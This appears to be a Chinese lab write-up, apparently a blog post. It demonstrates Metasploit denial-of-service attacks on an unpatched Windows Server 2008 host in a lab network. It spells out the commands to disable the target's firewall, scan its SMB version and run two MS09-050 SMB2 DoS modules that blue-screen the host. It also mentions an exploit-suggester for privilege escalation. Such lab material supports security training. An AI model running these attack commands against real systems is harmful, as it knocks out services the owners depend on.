Metasploit攻击winserver2008实例

一、实验目的

1)了解拒绝服务攻击的原理及其危害
2)了解SMB协议及其漏洞信息
3)使用Metasploit对win2008系统进行拒绝服务攻击

二、实验环境

漏洞主机:win server 2008,IP地址:10.1.1.144

攻击主机:Kali linux,IP地址:10.1.1.128

三、实验内容与实验要求

  1. 初步了解实验环境及信息收集
  2. 利用ms09_050_smb2_session_logoff漏洞攻击win server 2008主机
  3. 利用ms09_050_smb2_negotiate_pidhigh漏洞攻击win server 2008主机

四、实验过程与分析

实验步骤一
初步了解实验环境及信息收集
1.查看win server 2008漏洞主机的登录用户及网络配置信息,从下图2可以看出漏洞主机IP为10.1.1.144。使用命令如下:

whoami 查看当前登陆用户
ipconfig 查看网络配置信息

2.为了更好的演示攻击win server 2008系统实例需要关闭win server 2008系统的防火墙,win+R输入cmd,运行“netsh firewall set opmode mode=disable”命令

3.查看攻击者主机登陆用户及网络配置信息,从下图3可以看出攻击主机登陆用户为root ,IP为10.1.1.128
whoami 查看当前登陆用户
ifconfig 查看网络配置信息

在利用SMB漏洞进行DOS前需要先确定SMB的版本信息。下面利用metasploit自带的SMB扫描辅助模块来确定SMB的版本。
4.在kali中执行“msfconsole”,启动metasploit
service postgresql start 开启PostgreSQL数据库
msfconsole 启动metasploit

5.运行“use auxiliary/scanner/smb/smb_version”选择DOS攻击辅助模块
use auxiliary/scanner/smb/smb_version

6.show options查看配置选项
运行命令: show options

7.设置目标主机的IP,以及通过设置线程来提高扫描速度
set RHOSTS 10.1.1.144
set THREAD 10

8.开始运行,运行结束后SMB信息如下所示
run

实验步骤二
利用ms09_050_smb2_session_logoff漏洞攻击win server 2008主机
利用metasploit演示如何利用ms09_050_smb2_session_logoff漏洞对win server 2008进行DOS攻击。
1.在kali中执行“msfconsole”,启动metasploit
运行命令: service postgresql start 开启PostgreSQL数据库
运行命令:msfconsole 启动metasploit。如下图所示:

2.运行命令:“use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff”,选择DOS攻击辅助模块
use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff

3.运行命令:show options查看配置选项
show options

4.设置目标主机的IP,SMB服务的端口
运行命令: set RHOST 10.1.1.*
运行命令: set RPORT 445

5.开始攻击,出现下面的提示信息说明DOS攻击成功
运行命令: run -j

6.进一步验证攻击是否成功,查看win server 2008已经蓝屏

实验步骤三
利用ms09_050_smb2_negotiate_pidhigh漏洞攻击win server 2008主机
利用metasploit演示如何利用ms09_050_smb2_negotiate_pidhigh漏洞对win server 2008进行DOS攻击。

  1.在kali中执行“msfconsole”,启动metasploitservice postgresql start      开启PostgreSQL数据库msfconsole   启动metasploit2.运行“use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh”选择DOS攻击辅助模块use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh3.show options查看配置选项show options4.设置目标主机的IP,SMB服务的端口set RHOST 10.1.1.*set RPORT 4455.开始攻击,出现下面的提示信息说明DOS攻击成功run -j6.进一步验证攻击是否成功,查看win server 2008已经蓝屏

1) 查阅资料思考有哪些有效途径可以防范大规模DOS攻击?
要避免系统免受DoS攻击,网络管理员要积极谨慎地维护系统,确保无安全隐患和漏洞;恶意攻击方式则需要安装防火墙等安全设备过滤DoS攻击,同时强烈建议网络管理员应当定期查看安全设备的日志,及时发现对系统的安全威胁行为。
2) 查阅微软漏洞更新信息,存在哪些由服务器常用软件(比如:IE)导致的高危漏洞能攻破未打任何补丁的win server 2008系统?
MS08-058:Internet Explorer累积性安全更新,Internet Explorer中存在多个远程执行代码或信息泄露的漏洞。如果计算机用户使用IE浏览器点击浏览了特制的恶意Web网页,恶意攻击者就可以远程执行任意代码,最终导致受攻击的操作系统无法正常工作。
3) 结合谷歌和exploit-db.com收集win server 2008提权工具,并了解其运行原理。
Exploit-Suggester:
下载微软的漏洞数据库python2 windows-exploit-suggester.py –update;
然后进行比对,并输出到exploit.txt文件中
python2 windows-exploit-suggester.py --database 2018-08-31-mssb.xls --systeminfo win7.txt > exploit.txt;

Metasploit攻击winserver2008实例相关推荐

  1. Metasploit攻击win7实例(上)

    一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...

  2. Metasploit攻击linux实例

    一.实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二.实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali ...

  3. Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机

    攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessu ...

  4. 2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例

    一:扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息,扫描结果如下: 其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机. ...

  5. kali初讲——Metasploit攻击ms17_010复现

    Metasploit攻击--ms17_010漏洞利用 文章目录 Metasploit攻击--ms17_010漏洞利用 导论 一.ms17_010简介 二.攻击使用模块 三..攻击思路 四.具体实施 总 ...

  6. Kali渗透测试:使用工具Metasploit攻击操作系统

    Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...

  7. MetaSploit攻击实例讲解------社会工程学set攻击(kali linux 2016.2(rolling))(详细)

    来源:https://www.cnblogs.com/zlslch/p/6888540.html 不多说,直接上干货! 首先,如果你是用的BT5,则set的配置文件是在 /pentest/exploi ...

  8. MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...

  9. MetaSploit攻击实例讲解------攻击445端口漏洞(kali linux 2016.2(rolling))(详细)

    不多说,直接上干货! 大家,相信最近的这个事件,对于445端口已经是非常的小心了.勒索病毒 445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了 ...

  10. Metasploit攻击Oracle的环境搭建

    Metasploit中关于Oracle的攻击模块默认并不完全,需要自己做一些工作.本文主要记录在搭建环境的中的一些错误(操作系统Backtrack 5).在默认情况下使用oracle的一些攻击功能会出 ...

最新文章

  1. PyTorch常用代码段合集
  2. hadoop、spark/storm等大数据相关视频资料汇总下载
  3. 2021年人工神经网络第四次作业要求:第七题
  4. C语言main函数、return、exit函数
  5. QT5开发的程序打包发布
  6. linux race window,java开发环境(QTrace)
  7. matlab如何矩阵相除,Matlab中的矩阵除法有问题???
  8. MFC和Direct3D9一起使用
  9. Quartz简答介绍
  10. jq使用教程06_数据更新日志
  11. 二、Spring Cloud的配置 之 Eureka(服务注册中心)配置
  12. 卡耐基口才艺术与人际关系1
  13. pygame之key模块
  14. 刘强东学习亚马逊:控制供应链 技术是最大障碍
  15. 我的世界服务器皮肤修改,万用皮肤补丁CustomSkinLoader
  16. 修改微信小程序单选,复选框样式
  17. Linux命令之远程登录与执行远程主机命令
  18. 假期日历服务器无响应,PrimeNg日历日期无法正常工作(示例代码)
  19. 公链扩展路线之争:道阻且长的过程中Ardor 3.0能为我们带来什么?
  20. 使用 Web3.js 连接以太坊节点并查询区块链数据

热门文章

  1. word2013 打开一个新文档,之前打开的最小化的文档也会弹出来?
  2. 关于PWM脉冲宽度调制的点滴总结
  3. 理一理Maven的phase, goal, surefire, failsafe
  4. 怎么调大计算机浏览器内字体,电脑网页字体大小怎么调整(电脑里点击哪个是变换字体的)...
  5. 干货 | 携程商旅订单系统架构设计和优化实践
  6. 【mysql】文本字符串类型
  7. FPGA 光纤传输IP核的使用
  8. 使用百度OCR做答题软件辅助
  9. noip2005 篝火晚会
  10. CMD命令创建文件夹快捷方式